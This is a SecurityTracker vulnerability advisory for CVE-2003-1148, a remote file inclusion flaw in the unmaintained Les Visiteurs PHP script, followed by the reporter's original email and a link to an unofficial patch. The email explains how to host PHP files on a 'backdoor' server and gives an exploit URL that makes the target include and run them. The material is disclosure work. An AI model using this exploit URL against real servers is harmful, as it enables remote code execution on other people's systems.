SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Les Visiteurs Vendors:  phpinfo.net
Les Visiteurs Include File Error Lets Remote Users Execute Arbitrary Commands on the Target Server
SecurityTracker Alert ID:  1008011
SecurityTracker URL:  http://securitytracker.com/id?1008011
CVE Reference:  CVE-2003-1148   (Links to External Site)
OSVDB Reference:  2717 ,  3586   (Links to External Site)
Updated:  Oct 16 2006
Original Entry Date:  Oct 28 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0.1 and prior versions
Description:  An include file vulnerability was reported in the Les Visiteurs PHP-based script. A remote user can execute arbitary PHP code, including operating system commands, on the target system.

It is reported that the 'include/config.inc.php' and 'include/new-visitor.inc.php' files include some other files without validating the location of the included files. A remote user can create a specially crafted URL that will cause PHP code at a remote location to be included and executed by the target server.

A demonstration exploit URL is provided:

http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target server. The code and commands will run with the privileges of the target web server.
Solution:  No vendor solution was available at the time of this entry. [Editor's note: The report indicates that the software is no longer maintained by the vendor.]

An unofficial patch is available at:

http://chezwam.net/main/publications/lesvisiteurs/
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Matthieu Peschaud <bugtrack@chezwam.net>
Message History:   None.

 Source Message Contents
Date:  26 Oct 2003 01:45:52 -0000
From:  Matthieu Peschaud <bugtrack@chezwam.net>
Subject:  Les Visiteurs v2.0.1 code injection vulnerability

 



Les Visiteurs is a great statistics script written in php.
It gives you some graphicals informations on visitors of
your website.

This script was distributed by phpinfo.net but is no more
maintained since a year.

---------
In this version severals unprotected includes can be found 
in files:

- include/config.inc.php
- include/new-visitor.inc.php

It is possible to include a php file from a backdoor server, 
and execute it on the target's server.
You just have to create on the backdoor srv these files:
- lang/<lang>.inc.php
- db/db_mysql.inc.php

fill one with something like:
<?
echo '<?
echo "<br><br>included from backdoor server :p<br>";
?>';
?>

and call an url as:
http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
---------


Because the script is not maintained and will not be patched,
i make some tarballs with a patched version.

You will find it at this url:
http://chezwam.net/main/publications/lesvisiteurs/

Matthieu Peschaud
Epita - France


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2006, SecurityGlobal.net LLC